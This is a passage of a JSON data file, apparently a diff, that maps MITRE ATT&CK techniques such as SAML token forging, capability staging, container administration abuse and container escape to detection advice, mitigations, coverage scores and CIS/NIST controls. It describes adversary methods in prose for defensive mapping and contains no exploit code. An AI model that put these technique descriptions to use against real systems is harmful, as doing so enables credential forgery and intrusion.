about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.5162809523809524, + "adjusted_score": 0.5162809523809524, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.12,4.1,4.2,4.4,4.6,7.6,12.1,12.2,12.8,13.3,13.4,13.8,18.2,18.3,18.5,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-20", + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "IA-3", + "IA-4", + "SC-28", + "SC-3", + "SC-4", + "SC-7", + "SC-8", + "SI-10", + "SI-12", + "SI-15", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1606", + "name": "Forge Web Credentials", + "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)", + "url": "https://attack.mitre.org/techniques/T1606", + "tactics": [ + "Credential Access" + ], + "detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Logon Session: Logon Session Creation", + "Web Credential: Web Credential Creation", + "Web Credential: Web Credential Usage" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1606.001", + "name": "Forge Web Credentials: Web Cookies", + "url": "https://attack.mitre.org/techniques/T1606/001", + "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1606.002", + "name": "Forge Web Credentials: SAML Tokens", + "url": "https://attack.mitre.org/techniques/T1606/002", + "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)", + "detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\n\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.362252380952381, + "adjusted_score": 0.362252380952381, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "MA-5", + "SC-17", + "SI-2" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1608", + "name": "Stage Capabilities", + "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)\n* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)", + "url": "https://attack.mitre.org/techniques/T1608", + "tactics": [ + "Resource Development" + ], + "detection": "If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Internet Scan: Response Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1608.001", + "name": "Stage Capabilities: Upload Malware", + "url": "https://attack.mitre.org/techniques/T1608/001", + "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.", + "detection": "If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.002", + "name": "Stage Capabilities: Upload Tool", + "url": "https://attack.mitre.org/techniques/T1608/002", + "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", + "detection": "If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.003", + "name": "Stage Capabilities: Install Digital Certificate", + "url": "https://attack.mitre.org/techniques/T1608/003", + "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).", + "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.004", + "name": "Stage Capabilities: Drive-by Target", + "url": "https://attack.mitre.org/techniques/T1608/004", + "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", + "detection": "If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1608.005", + "name": "Stage Capabilities: Link Target", + "url": "https://attack.mitre.org/techniques/T1608/005", + "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.", + "detection": "If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05476190476190476, + "adjusted_score": 0.05476190476190476, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1609", + "name": "Container Administration Command", + "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)", + "url": "https://attack.mitre.org/techniques/T1609", + "tactics": [ + "Execution" + ], + "detection": "Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. ", + "platforms": [ + "Containers" + ], + "data_sources": [ + "Command: Command Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.1255047619047619, + "adjusted_score": 0.1255047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-6", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1610", + "name": "Deploy Container", + "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.\n\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)", + "url": "https://attack.mitre.org/techniques/T1610", + "tactics": [ + "Defense Evasion", + "Execution" + ], + "detection": "Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.", + "platforms": [ + "Containers" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Container: Container Creation", + "Container: Container Start", + "Pod: Pod Creation", + "Pod: Pod Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.17948571428571425, + "adjusted_score": 0.17948571428571425, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-6", + "CM-6", + "CM-7", + "IA-2", + "SC-7", + "SI-4" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1611", + "name": "Escape to Host", + "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "url": "https://attack.mitre.org/techniques/T1611", + "tactics": [ + "Privilege Escalation" + ], + "detection": "Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as mount (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.", + "platforms": [ + "Containers", + "Linux", + "Windows" + ], + "data_sources": [ + "Container: Container Creation", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": 